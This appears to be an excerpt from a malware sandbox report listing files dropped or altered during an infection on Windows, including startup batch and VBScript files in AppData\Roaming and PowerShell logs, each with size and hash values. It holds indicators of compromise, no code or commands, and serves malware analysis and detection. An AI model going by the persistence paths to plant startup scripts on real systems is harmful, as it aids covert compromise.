SHA512 19931730dc94978e4c27f1886836b2e50fea265209e6d8dda5a39d0c345ae72a9c9c71756ea17dcd1e8e8d89985b3db475cd3a6e87642c62eeb9ff44eeed2a57
-
C:\Users\Admin\AppData\Roaming\startup_str_937.bat
Filesize 513KB
MD5 a84be587721ab2558489178539f283e6
SHA1 5a48f5c98f7366d13f371965c19c98a5754bd90b
SHA256 32cfb4e83f43787c79ef6a15bef53137a0e9a6d6d558ef1532993fb8369cc8fd
SHA512 c1c4e35246c39f3e710cbd261187c7968d75c65fd1c4b96f6caa6ddec1484ca42f2431f4184ec0061cd7b2e0d3478db993f88a043106f0ce9d7ae859c3f5f931
-
C:\Users\Admin\AppData\Roaming\startup_str_937.vbs
Filesize 115B
MD5 31ac93556d45bd5c7cda7de15c644174
SHA1 9c244354242c78b753d64c22bfb2ad5a8085ddc9
SHA256 642d1de104dad1181474117b26e8b04dccd3726e217bcfeeba3ec1995485aae1
SHA512 81a40b94453357af856ad29253ba61b6df35ee5b798f2a2ee8fc15ca11eff67de208b51cdc740e62b81c451ec8041602d6a53c50df911dd0c82640d6428283e4
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize 302B
MD5 583512c128046c1731f9e43f1f8d99c6
SHA1 5e1de015d4ecda4860d83e0ab74c813bee4091c9
SHA256 4d93e3f7239a3cf3191420807731ed3f8482ccea1b1f0b960ce152a84b17ef98
SHA512 3ea0cdc6d55519bcc612c108ab6fc7bd88b75c2da41e4566869ecee5f6845f661341be19fbb66c8d81d1f99282e2fd5cb9dfdc487512a9ead26ca990aa54b368
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
Filesize 412B
MD5 2176fe5eac80179554ec74b8ae6ad885
SHA1 6a5ecaffbfc964d569b331f5c932f6e9c25984c0
SHA256 b075c4dc0f8f094ae23de699893f912bbbee9597a1abe973997c146194bcee86
SHA512 ed684a023f18f7277b428e39d3d96ad7e4f427a28f627d741fa3be60828a9b9b57200606ae807bc425bcdde2fa54a8f96d1ef1347d2b631f303964ae28d60c54
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize 2KB
MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 bb7d9cd87343b2c81c21c7b27e6ab694
SHA1 27475110d09f1fc948f1d5ecf3e41aba752401fd
SHA256 b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df
SHA512 bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b